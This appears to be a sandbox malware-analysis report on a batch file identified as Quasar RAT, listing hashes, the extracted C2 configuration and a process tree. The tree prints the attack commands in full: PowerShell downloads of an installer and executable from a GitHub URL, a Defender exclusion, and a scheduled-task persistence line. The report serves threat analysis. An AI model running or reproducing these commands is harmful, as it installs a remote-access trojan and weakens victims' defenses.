Overview

overview

10

Static

static

1

main (4).bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    43s
  • max time network
    38s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-11-2024 03:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    main (4).bat

  • Size

    17KB

  • MD5

    d2c79d02019fe6507207e4d57360c2d0

  • SHA1

    58c6e205d730b3cdb1186d9c8618c891e6ddbcde

  • SHA256

    900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4

  • SHA512

    20b38b3b3827c23df5a7c0fdce51524c6f4dc2192b139abef8156f69a25b263f1c5ce502cbd328a056d01396e83a6338e836a55f46a15ce7567313ad82549610

  • SSDEEP

    192:p3U9MgR/KWzBkRIKxZnB2Gl/631wAZ/vhAaiU74/s7HKwSRBPJyU4dWfehLp/rh:C9Mk/p9kRIVHrEsvSRBPJy7Wfezh

Score
10/10
quasarbotdefense_evasionexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wooting2000-47095.portmap.host:47095

Mutex

2e05f1ef-743b-4020-b18a-7f4276517e8b

Attributes
  • encryption_key

    E83D6FC31962786DAEA703F111D2381786DF06CA

  • install_name

    Modification1.5.14.12.exe

  • log_directory

    Logs

  • reconnect_delay

    3126

  • startup_key

    explorer.dll

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Powershell Invoke Web Request.

    execution
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in System32 directory 5 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\main (4).bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3304
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K installer.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3460
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:5096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Set-MpPreference -ExclusionExtension exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4344
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/Modification11910275.exe' -OutFile Modification11910275.exe"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2432
        • C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
          Modification11910275.exe
          3⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3380
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3080
          • C:\Windows\system32\SubDir\Modification1.5.14.12.exe
            "C:\Windows\system32\SubDir\Modification1.5.14.12.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4648
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "explorer.dll" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Modification1.5.14.12.exe" /rl HIGHEST /f
              5⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -Command "Get-Process cmd -ErrorAction SilentlyContinue | ForEach-Object { $_.Kill() }"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:800
    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2600

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      5f4c933102a824f41e258078e34165a7

      SHA1

      d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

      SHA256

      d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

      SHA512

      a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      da255d6e827f6f566661652c5f08620e

      SHA1

      27a36eb35d67c0ef70bf71d5be1a989641808d65

      SHA256

      a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956

      SHA512

      7aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      ea5a0b15a4152d282737ef33992467aa

      SHA1

      e9188e3a25982b1477c6cbed57b46e091f4ad70e

      SHA256

      8ddb2cb1482af22dff12819c55aa24d3e83dadbbc410e656b7f591422e627503

      SHA512

      875ef3bf42d6ffd198b00e50f1cc7d539a410a9610fe3e87a47b44d7e4eabff7907672fbc6dc63fbe941d90217de0bb47c86ef8b0a9d17c04b9fd1cd9ecf33bd

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      86524148345b88cfda3de7efd74146df

      SHA1

      cd393a658bd8105e267cbcdffb8f9de6e0358db2

      SHA256

      12dfa693d94e310ed907aa6d532caea38134297120b9a13ee80fcfab68c973c0

      SHA512

      937dd5cace74c98e9c4e8e21a0aded32fb67e0b864a966339fdee6e59a0cc5860dcc6d378ecaab0f394bdb786845993582a93fa348414807d5805153dffe708b

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
      Filesize

      10KB

      MD5

      964219fcbf4c1e0008bc5e05686367a9

      SHA1

      685a0b860afbfd43305bc67763e41b296a22ba8b

      SHA256

      4f4388ce8c3055db4827ad4b6d7d6ffc7bead99955a3fbe44ab3a5454651ae25

      SHA512

      2745f64b2bd54740a5c1f754785c39eeda9b6b5112707cc8630ba188638442de7c636446f750aeb340905d9da26f96ee4e7f7c96e2b690058ce29d7b6efe8c16

      Download Submit

    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
      Filesize

      10KB

      MD5

      1301a13a0b62ba61652cdbf2d61f80fa

      SHA1

      1911d1f0d097e8f5275a29e17b0bcef305df1d9e

      SHA256

      7e75ad955706d05f5934810aebbd3b5a7742d5e5766efd9c4fc17ee492b2f716

      SHA512

      66aa4261628bb31ee416af70f4159c02e5bbfbe2f7645e87d70bb35b1f20fa915d62b25d99cd72c59580d1f64e6c6b5ad36ace6600d3bcdb67f45036d768ed8b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Modification11910275.exe
      Filesize

      3.1MB

      MD5

      fa9b1524e725c4a251d07007f15fa947

      SHA1

      5c023619d8180b611acb544fa1cd8bd31de9e61c

      SHA256

      0cbcab350f25f5764dc967cf6f764eccdd094b1f8ca14d60a731713ace6b1aec

      SHA512

      dac63f0970092186a909dafeb75cee3e1ad3b393984cf78a1d88e339a39ef235567f74b7a874b237762b8a46e74f8cb319add4bcbc4bdf8f76ec8e1476fb44db

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1norcnz.khs.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\installer.bat
      Filesize

      1KB

      MD5

      43bd9a829d434583f1c14da28dca72f6

      SHA1

      8fac8d694f4c15d42458bdc5540e0547cb88c83c

      SHA256

      be6d97cbf700b60bb57bf24889af41c0e3e4d3c70800bc164ef71a0608beb6df

      SHA512

      2bbb73cf8c2a6d0e61ec58b2a125240daf73c87742f377fc2aede5ce24e11f492044b47c98918168148c632b2c4f3f058feef45479265dd51951aac8ceb585da

      Download Submit

    • memory/3304-16-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3304-9-0x000002ABDB790000-0x000002ABDB7B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3304-10-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3304-11-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3304-0-0x00007FFE400D3000-0x00007FFE400D5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3304-12-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3380-47-0x0000000000400000-0x0000000000724000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/4344-32-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4344-20-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4344-19-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4344-21-0x00007FFE400D0000-0x00007FFE40B92000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4648-64-0x000000001B9C0000-0x000000001BA10000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4648-65-0x000000001C7B0000-0x000000001C862000-memory.dmp

      Filesize

      712KB

      Download

    • memory/4648-68-0x000000001C6F0000-0x000000001C702000-memory.dmp

      Filesize

      72KB

      Download

    • memory/4648-69-0x000000001C750000-0x000000001C78C000-memory.dmp

      Filesize

      240KB

      Download